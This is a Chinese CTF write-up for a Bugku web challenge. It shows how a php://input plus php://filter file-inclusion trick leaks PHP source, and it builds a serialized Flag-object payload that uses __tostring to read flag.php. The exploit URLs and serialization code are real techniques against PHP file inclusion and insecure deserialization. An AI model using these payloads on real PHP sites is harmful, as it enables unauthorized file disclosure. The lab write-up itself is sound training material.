【Bugku CTF】welcome to bugkuctf 100 writeup
今天心情有点复杂!!!
0x01 前言
解题链接:http://123.206.87.240:8006/test1/
经过一番资料学习emmmm,此题知识点主要 YOU 代码审计、反序列化等,,,,
查看源码
代码审计啦
三个GET传参、条件存在file要求为hint.php
关于php://filter
可以看这位大佬的博客
https://www.leavesongs.com/PENETRATION/php-filter-magic.html
关于php://input
官方描述:
“php://input可以读取没有处理过的POST数据。相较于$HTTP_RAW_POST_DATA而言,它给内存带来的压力较小,并且不需要特殊的php.ini设置。php://input不能用于enctype=multipart/form-data”
支持的协议和封装协议
https://php.net/manual/zh/wrappers.php
构造payload -------------------------读取hint.php文件内容
http://123.206.87.240:8006/test1/index.php?
txt=php://input&file=php://filter/read=convert.base64-encode/resource=hint.php&password=
post data : welcome to the bugkuctf
base64解密
PD9waHAgIA0KICANCmNsYXNzIEZsYWd7Ly9mbGFnLnBocCAgDQogICAgcHVibGljICRmaWxlOyAgDQogICAgcHVibGljIGZ1bmN0aW9uIF9fdG9zdHJpbmcoKXsgIA0KICAgICAgICBpZihpc3NldCgkdGhpcy0+ZmlsZSkpeyAgDQogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgDQoJCQllY2hvICI8YnI+IjsNCgkJcmV0dXJuICgiZ29vZCIpOw0KICAgICAgICB9ICANCiAgICB9ICANCn0gIA0KPz4gIA==
<?php
class Flag{//flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("good");
}
}
}
?>
用上面方法读取index.php(原因不知)
解码为
<?php
$txt = $_GET["txt"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){
echo "hello friend!<br>";
if(preg_match("/flag/",$file)){
echo "涓嶈兘鐜板湪灏辩粰浣爁lag鍝�";
exit();
}else{
include($file);
$password = unserialize($password);
echo $password;
}
}else{
echo "you are not the number of bugku ! ";
}
?>
<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
echo "hello admin!<br>";
include($file); //hint.php
}else{
echo "you are not admin ! ";
}
--> ��
魔术方法 __tostring() https://www.php.net/manual/zh/language.oop5.magic.php
preg_match https://php.net/manual/zh/function.preg-match.php
unserialize 反序列化 https://blog.csdn.net/wy0123/article/details/79345842 (没了解构造原理找大佬博客)
将hint.php中的Flag方法当做字符串执行时,会自动执行 __tostring方法,只有echo,只能输出一个或多个字符串,所以构造password为Flag类型,其中的string变量password为Flag类型,其中的string变量flie=flag.php即可
注意反序列化
password);
因此知道需要构造序列化对象payload
<?php
class Flag{
public $file;
}
$a = new Flag();
$a->file = "flag.php";
$a = serialize($a);
print_r($a);
?>
输出:
O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
最后payload
/test1/index.php?txt=php://input&file=hint.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
推荐阅读
-
CTF/CTF练习平台-welcome to bugkuctf【php://filter及php://input】
-
Bugku CTF 杂项(13-20) Writeup
-
Bugku CTF 加密writeup (未完待续)
-
bugku【welcome to bugkuctf】题解
-
Bugku CTF 杂项(21-29) Writeup
-
Bugku——welcome to bugkuctf(一道练习php://filter和php://input的好题)
-
bugKuCTF第四道reverse题目Timer(阿里CTF)writeup
-
Bugku CTF Web(1-16) writeup
-
【Bugku CTF】welcome to bugkuctf 100 writeup
-
【bugkuCTF】LoopAndLoop(阿里CTF)writeup